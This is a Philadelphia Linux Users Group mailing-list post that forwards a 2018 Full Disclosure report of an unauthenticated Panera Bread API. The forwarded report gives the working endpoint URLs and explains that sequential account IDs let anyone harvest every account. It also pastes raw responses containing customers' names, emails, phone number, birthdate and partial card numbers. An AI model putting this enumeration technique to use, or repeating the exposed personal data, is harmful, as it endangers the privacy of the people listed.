Michael Lazin on 3 Apr 2018 11:15:12 -0700


[Date Prev] [Date Next] [Thread Prev] [Thread Next] [Date Index] [Thread Index]

[PLUG] Fwd: [FD] Massive Breach in Panera Bread


I realize this is from another listserv but I thought this would be of interest to plug users because of the popularity of Panera for it's open wifi.  It seems that data breaches are the new norm.  I recall a friend of mine saying that cracking is like shooting fish in a barrel, the hard part is building bullet proof fish.


---------- Forwarded message ----------
From: Jack Beanstalk <pnrabrdthrwy@gmail.com>
Date: Mon, Apr 2, 2018 at 3:43 PM
Subject: [FD] Massive Breach in Panera Bread
To: fulldisclosure@seclists.org


7682200f0cd27a4f1a3c2301941d959aae7abf89136c38a4f1ded4d2bb7a67d7

I'd like to report a security vulnerability in Panera Bread's web
application. There is a publicly available, completely unauthenticated
API endpoint that allows anyone to access the following information
about anyone who has ever signed up for an account to order food from
Panera Bread:

1. Username

2. First and last name

3. Email address

4. Phone number

5. Birthday

6. Last four digits of saved credit card number

7. Saved home address

8. Social account integration information

9. Saved user food preferences and dietary restrictions

Here are the API endpoints which you can use to verify this information:

1. https://delivery.panerabread.com/foundation-api/users/by-phone/9140000000

This returns the following JSON:

{"accounts": [{"username":"denys","name":"romona
ruiz","cardNumber":"********6515"},{"username":"mhmulcahy@hotmail.com","name":"Marie
Mulcahy","cardNumber":"********5527"},{"username":"fenrny@msn.com","name":"F
B","cardNumber":"********7921"},{"username":"sabooky1@yahoo.com","name":"C
Davis","cardNumber":"********7108"},{"username":"jorgeialcalde","name":"Jorge
Alcalde","cardNumber":"********6129"},{"username":"ktennister37@aol.com","name":"Kei
Kino","cardNumber":"********6061"},{"username":"gettingbetter812@yahoo.com","name":"jan
jones","cardNumber":"********8950"},{"username":"kennny","name":"kenny
poteat","cardNumber":"********4412"},{"username":"angelo151","name":"angelo
ianello","cardNumber":"********8386"},{"username":"dblaperch@aol.com","name":"Deborah
LaPerch","cardNumber":"********5384"},{"username":"bagnoni1@optonline.net","name":"sadie
bagnoni","cardNumber":"********5144"},{"username":"arsbreva@hotmail.com","name":"Marea
needle","cardNumber":"********7488"},{"username":"contessa1234","name":"CONTESSA
SLEDGE","cardNumber":"********6702"},{"username":"lindapam","name":"elizabeth
forlenzo","cardNumber":"********7085"},{"username":"jue-95@hotmail.com","name":"juline
G","cardNumber":"********4220"},{"username":"gleuanter","name":"Leo
Zinder","cardNumber":"********9123"},{"username":"artlaura","name":"arthur
hanson","cardNumber":"********8139"},{"username":"dlongua","name":"denise
longua","cardNumber":"********0102"},{"username":"homestead19-86@msn.com","name":"Sandra
Baglione","cardNumber":"********6851"},{"username":"kilsha22","name":"kicia
fulchek","cardNumber":"********2654"}]}

Note that you can look up usernames/email addresses for Panera Bread
accounts if you know the target's phone number. This returns the
username/email address and last four digits of the saved credit card
of every user who has ever signed up with that phone number.

2. https://delivery.panerabread.com/foundation-api/users/uramp/7382194

This returns the following JSON:

{"customerId":7382194,"username":"abcascio@cox.net","firstName":"Anthony","lastName":"Cascio","loyalty":{"cardNumber":"603077990852"},"emails":[{"id":23860763,"emailAddress":"abcascio@cox.net","emailType":"Personal","isDefault":true,"isOpt":true,"isVerified":true}],"phones":[{"id":18295989,"phoneNumber":"7032662951","phoneType":"Residential","countryCode":"1","extension":null,"name":null,"isSmsOpt":false,"isCallOpt":false,"isDefault":true,"isValid":true,"smsPreferences":[{"programName":"Delivery","isOpt":false,"isOptPending":false}]}],"isSmsGlobalOpt":false,"isEmailGlobalOpt":true,"isMobilePushOpt":false,"birthDate":{"birthDay":"25","birthMonth":"05","birthYear":"1948"},"userPreferences":{"foodPreferences":[{"code":3,"displayName":"Low
Fat"}],"gatherPreference":{"code":7,"displayName":"Meal with
family"}},"subscriptions":{"subscriptions":[{"subscriptionCode":1,"displayName":"Reward
Reminders & Expiration
Alerts","isSubscribed":false,"tncVersion":null},{"subscriptionCode":2,"displayName":"Panera
Bread Updates & Special
Offers","isSubscribed":false,"tncVersion":null}],"suppressors":[{"suppressionCode":1,"displayName":"Catering","isSuppressed":false},{"suppressionCode":2,"displayName":"CPG","isSuppressed":false}]},"addresses":[],"paymentOptions":{"creditCards":[],"payPals":[],"giftCards":[],"corporateCateringAccounts":[]},"taxExemptions":null,"socialIntegration":null,"favoriteCafes":[]}

In this context, "7382194" is the user's account ID. Panera Bread uses
sequential integers for account IDs, which means that if your goal is
to gather as much information as you can instead about someone, you
can simply increment through the accounts and collect as much as you'd
like, up to and including the entire database.

Hopefully they'll fix this if it gets enough attention.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/



--
Michael Lazin

to gar auto estin noein te kai ennai
___________________________________________________________________________
Philadelphia Linux Users Group         --        http://www.phillylinux.org
Announcements - http://lists.phillylinux.org/mailman/listinfo/plug-announce
General Discussion  --   http://lists.phillylinux.org/mailman/listinfo/plug